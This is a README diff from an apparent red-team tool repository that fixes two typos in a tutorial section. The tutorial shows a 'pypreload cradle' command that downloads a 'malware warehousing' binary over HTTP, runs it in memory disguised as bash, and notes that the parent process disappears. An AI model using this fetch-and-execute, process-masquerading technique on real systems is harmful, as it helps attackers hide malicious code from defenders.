dsnezhkov/zombieant/README.md

 #### Loading and Executing Malware Warehousing ZAFSrv with PyPreload

-In the same vaein we can load our ZAFSrv into memory with the pypreload cradle:
+In the same vein we can load our ZAFSrv into memory with the pypreload cradle:

 ```sh
 $ pypreload.py  -t bin -l http://127.0.0.1:8080/zaf -d bash
 ```

-Note: as you look at the process table and the `/proc` entries notice thay the parent is gone (pypreload cradle), and the binary loaded (ZAFSrv)
+Note: as you look at the process table and the `/proc` entries notice that the parent is gone (pypreload cradle), and the binary loaded (ZAFSrv)

 ```sh
 $ ls -l /proc/56509/fd/